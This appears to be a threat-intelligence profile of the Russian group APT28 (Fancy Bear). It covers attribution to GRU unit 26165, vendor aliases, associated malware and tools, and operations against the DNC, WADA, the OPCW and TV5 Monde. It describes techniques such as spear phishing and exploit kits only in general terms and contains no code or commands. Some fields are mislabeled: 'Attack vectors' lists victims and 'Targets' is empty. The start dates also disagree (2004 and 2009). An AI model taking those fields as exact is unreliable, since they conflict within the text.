APT28 is a threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165. This group has been active since at least 2004. APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations. Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
Name: Sofacy (Kaspersky), APT 28 (Mandiant), Fancy Bear (CrowdStrike), Sednit (ESET), Group 74 (Talos), TG-4127 (SecureWorks), Pawn Storm (Trend Micro), Tsar Team (iSight), Strontium (Microsoft), Swallowtail (Symantec), SIG40 (NSA), Snakemackerel (iDefense), Iron Twilight (SecureWorks), ATK 5 (Thales), T-APT-12 (Tencent), ITG05 (IBM), TAG-0700 (Google), Grizzly Steppe (US Government) together with APT 29, Cozy Bear, The Dukes
Location: Russia
Suspected attribution: General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165
Date of initial activity: 2004
Targets:
Motivation: Information theft and espionage
Associated tools: Cannon, certutil, Computrace, CORESHELL, DealersChoice, Downdelph, Drovorub, Foozer, HIDEDRV, JHUHUGIT, Koadic, Komplex, LoJax, Mimikatz, Nimcy, OLDBAIT, PocoDown, ProcDump, PythocyDbg, Responder, Sedkit, Sedreco, SkinnyBoy, USBStealer, VPNFilter, Winexe, WinIDS, X-Agent, X-Tunnel, Zebrocy, Living off the Land.
Attack vectors: US political campaigns, the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.
How they work:
APT28 likely seeks to collect intelligence about Georgia’s security and political dynamics by targeting officials working for the Ministry of Internal Affairs and the Ministry of Defense.
APT28 has demonstrated interest in Eastern European governments and security organizations. These victims would provide the Russian government with an ability to predict policymaker intentions and gauge its ability to influence public opinion. APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe.
Active since at least 2009, the IRON TWILIGHT threat group targets media, governments, military, and international non-governmental organizations (NGOs) that often have a security focus. It appears to focus on political and military espionage and has used obtained material in ‘active measures’ operations and to retaliate against actions that the Russian government perceives as hostile. CTU researchers assess with high confidence that IRON TWILIGHT is operated by the GRU, Russia’s military intelligence service. IRON TWILIGHT was responsible for the April 2015 compromise against French television network TV5 Monde which resulted in its broadcast being taken off the air. The group was responsible for the 2016 breaches of the Democratic National Committee (DNC) network and Hillary Clinton’s campaign staff email accounts. In 2016, IRON TWILIGHT attacked the World Anti-Doping Agency (WADA) and publicly released medical files relating to international athletes under their alias ‘Fancy Bears Hack Team’.
The group was also responsible for the attempted cyber attacks on the Organization for the Prohibition of Chemical Weapons (OPCW). IRON TWILIGHT has used spear phishing emails containing malicious attachments or links to a custom exploit kit to compromise systems. Victims are also redirected to the exploit kit via strategic web compromises. IRON TWILIGHT’s toolset includes malware for Windows and Linux-based operating systems and iOS devices. The threat actors have used targeted phishing campaigns to steal credentials for webmail accounts.
